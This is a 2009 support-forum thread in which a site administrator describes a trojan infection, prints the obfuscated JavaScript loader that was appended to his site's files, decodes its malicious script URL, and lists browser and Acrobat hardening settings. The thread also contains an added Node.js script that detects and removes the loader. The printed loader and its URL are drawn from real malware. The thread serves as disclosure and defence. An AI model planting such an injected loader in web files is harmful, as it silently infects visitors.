Cross-Browser.com

X Library Forums

Announcement

New user registration is currently disabled.

#1 December 21, 2009 11:36:00 am

MikeFoster
Administrator
From: Alabama, USA
Registered: April 27, 2007
Posts: 874

PLEASE READ! Forums Hacked? ... No!

I'm not sure what's going on. I think I got that trojan again (Trojan.Vundo.H), but this time I reacted immediately and I had already changed all my passwords.

One guess is that someone is hacking this forum and it causes you to get the trojan when viewing their post. I get a dialog box about opening a PDF file, I cancel it, then there's an svchost process running, taking 50% CPU time.

If this suspicion is true then it means some of you may have got it too. I am so very, very sorry. If this happens, you need to immediately pull your network cable, or turn your router off. Reboot in safe mode. Run something like Malwarebytes Anti-Malware, then run HijackThis and do a complete, manual clean-up. Note that HijackThis is a very powerful and potentially dangerous tool. If you do not know how to use it then don't! Get someone to help you. There are forums where you can post a HijackThis log and they will help you. Needless to say, you need to be doing that on a computer other than the infected one. After this, to be safe, change ALL your passwords. If you have websites where you access your host via FTP or SSH then check all "index.*" and "*.js" files. Some JS may have been added to the end of those files which, I assume, spreads whatever this is.

These people are not hackers. "We" are hackers. These people are no different than paid thugs who break into your home. Their main goal is forced hosting and viral spread of advertising. Yes, advertising. They give honest advertising companies a very bad name. These scum are not doing this for fun - they are getting paid to do it - and I imagine the actual advertisers have no idea how their links are getting spread - they just purchase some "package" from a shady company who, it seems in this case, works with some companies in Russia who actually develop this stuff. I curse you, you sorry SOBs.

I deleted the suspect post as soon as I saw it. But, again, I sincerely apologize if any of you caught this. I think the only thing I can do is to take this forum down. I've been having to spend way too much time on maintenance, and now this. Sigh.

#2 December 21, 2009 11:40:30 pm

MikeFoster

Re: PLEASE READ! Forums Hacked? ... No!

I now have the total number of registered users down to 196, whereas just a few days ago it was over 1500. I deleted any posts and users that were suspect in any way. I want to make this a forum you feel safe at - I promise you I am trying hard to do that. So far, nobody has reported that they caught anything from this forum... except me. So I'm beginning to wonder if I actually caught it from this forum or not. At any rate, I have disabled new user registration for now.

#3 December 23, 2009 10:50:45 am

MikeFoster

Re: PLEASE READ! Forums Hacked? ... No!

Update

I've decided that the forums were not hacked. Somehow I picked up the trojan which, because I stupidly had passwords stored in WinSCP (which I no longer do), was able to append some JavaScript to the end of many files on my sites. I've spent many hours cleaning up the mess! The second time was what made me think the forums had been hacked, but what happened was that I viewed a page the browser had cached, which still had the malicious code. I've cleared my browsers' caches now.

Here is the malicious code (it was in a script element). DO NOT run this! I've changed a certain method call to "doc.CE" so it can't accidentally cause problems.

/*GNU GPL*/
try {
  window.onload = function () {
    var Aaiamw935w = doc.CE('script');
    Aaiamw935w.setAttribute('type', 'text/javascript');
    Aaiamw935w.setAttribute('src', 'h&!t!)t$$p(:#(^@/#^#/&@(z)&!!&y^#l))o&^m##!-))&c@^$o()#m^.)&@s!@^&t@(u)(!d#(@i!^)v)##e)@&r^z$&e!@i!&c$h#$$n&i^#(s).!c(!)o)!^m#.#)^#t)^^!!o)@#p!i#)$x&&)-#c$&^o^$)m#!@.!!s$&)i^#&#m&!(p@@^l#(#e!^#@#w)((^^o&(r)#l&!)d$)#(h!&o)^u!@#&s^&(e@^!.)r^&@u&@@&:@8(^!@!0@^8!$@^0@$!/@w&i@)r!$)e$&^d@.)!$^c&@#o)($m&)/&w((@((i)$^r!@)@e&)d@#.!$c@o$)m@#)@/($g#(o^@&o!g!#l@^(!(e@.!&)c(o)@m@^^&/(^$t)u&)d)##o&((!u(((.(c$o!^!m$$&/@$a#!@^s#g^$.@@^t!)@$o^$/^^$#'.replace(/\$|@|\!|&|\^|#|\)|\(/ig, ''));
    Aaiamw935w.setAttribute('defer', 'defer');
    document.body.appendChild(Aaiamw935w);
  }
}
catch (e) {
}

The code creates a script element and has it run some code from this URL: http://zylom-com.studiverzeichnis.com.topix-com.simpleworldhouse.ru:8080/wired.com/wired.com/google.com/tudou.com/asg.to/. It appears to deliver a PDF which itself runs a script (I'm just guessing about the PDF script) which modifies a registry entry to cause "siszyd32.exe" to be run on startup. You'll get a dialog box with something about updating a PDF (I can't remember the exact wording), and even if you cancel it, the deed is done. The properties for "siszyd32.exe" have this:

Nero StartSmart 8 Inline Function DiscCopy Server
Original filename: InFDiscCopyServer.exe
Version: 8.3.1.2
Company: Nero AG

I have no idea what it copied from my hard drive and I'm thinking seriously about reformatting and reinstalling everything. This trojan is known as one of the following, I'm not really sure which: "Trojan.Vundo.H", "Troj/Agent-LVN" or "Rogue.SystemSecurity".

I'm posting this information in the hopes that it will help someone - as well as myself. I didn't think I could get something like this using Firefox, but I'm guessing the blame is more on Acrobat Reader than on Firefox. I'd like to know what configuration changes I need to make in Firefox and/or Acrobat Reader so that this cannot happen again.
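As an added example (not code from Mike's post or from the X Library project), here is a small Node.js script a site owner could run over their "index.*" and "*.js" files: it finds the appended "/*GNU GPL*/" loader shown above, replays the loader's own replace() call to reveal the real script URL for blocklisting without executing anything, and strips the block. The sample file and its URL are constructed placeholders.

```javascript
// Added example, not from the forum post or the X Library project.
// Detects the appended loader described above, recovers its real URL by
// replaying the same String.replace(), and cleans the file. Node.js assumed.

const LOADER_RE = /\/\*GNU GPL\*\/\s*try\s*\{[\s\S]*?\}\s*catch\s*\(\s*e\s*\)\s*\{\s*\}/;
// Captures: scrambled URL, body of the stripping regex, and its flags.
const SRC_RE = /setAttribute\('src',\s*'([^']*)'\.replace\(\/([^\/]+)\/(\w*),\s*''\)\)/;

function decodeSrc(scrambled, pattern, flags) {
  // Same regex the loader uses; 'g' is forced so every junk character is dropped.
  const f = flags.includes('g') ? flags : flags + 'g';
  return scrambled.replace(new RegExp(pattern, f), '');
}

function inspectFile(contents) {
  const m = LOADER_RE.exec(contents);
  if (!m) return { infected: false };
  const src = SRC_RE.exec(m[0]);
  const trailing = contents.slice(m.index + m[0].length);
  return {
    infected: true,
    appendedAtEnd: trailing.trim() === '', // the post saw it appended to file ends
    url: src ? decodeSrc(src[1], src[2], src[3]) : null,
  };
}

function cleanFile(contents) {
  // Drops the loader block and trailing whitespace; legitimate content is kept.
  return contents.replace(LOADER_RE, '').replace(/\s+$/, '') + '\n';
}

// Constructed sample: a one-line legitimate file with the loader appended; doc.CE kept neutered.
const SAMPLE = [
  'function init() { return 1; }',
  '/*GNU GPL*/',
  'try {',
  '  window.onload = function () {',
  "    var Aaiamw935w = doc.CE('script');",
  "    Aaiamw935w.setAttribute('type', 'text/javascript');",
  "    Aaiamw935w.setAttribute('src', 'h$t@t!p:&/^/e#x)a(m$p@l!e.&i^n#v$a@l!i^d/&x.js'.replace(/\\$|@|\\!|&|\\^|#|\\)|\\(/ig, ''));",
  "    Aaiamw935w.setAttribute('defer', 'defer');",
  '    document.body.appendChild(Aaiamw935w);',
  '  }',
  '}',
  'catch (e) {',
  '}',
].join('\n');
```

Pointing inspectFile at each file under the web root gives a list of infected paths plus the decoded URL to block at the proxy, and cleanFile restores the file once a backup has been taken.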

#4 December 28, 2009 2:42:47 pm

MikeFoster

Re: PLEASE READ! Forums Hacked? ... No!

Here are some application settings I changed, in the hope of preventing this from happening again:

In Firefox, go to "Tools / Options / Applications" and for all Adobe Acrobat types set their action to "Always ask".

In Adobe Acrobat Reader, go to "Edit / Preferences" (I don't actually remember what all I changed here). Under "JavaScript", disable "Acrobat JavaScript". Under "Multimedia Trust", set all operations to "Prompt". In general, disable any kind of automatic updates and anywhere you have a choice between auto and "prompt" choose "prompt".

I have no idea if making these changes will prevent the trojan from being installed. The only way to be sure is to set up a page which contains the malicious code and give it a try... but I'm too chicken to try it.

Powered by PunBB 1.2.15
Copyright © 2002–2005 Rickard Andersson
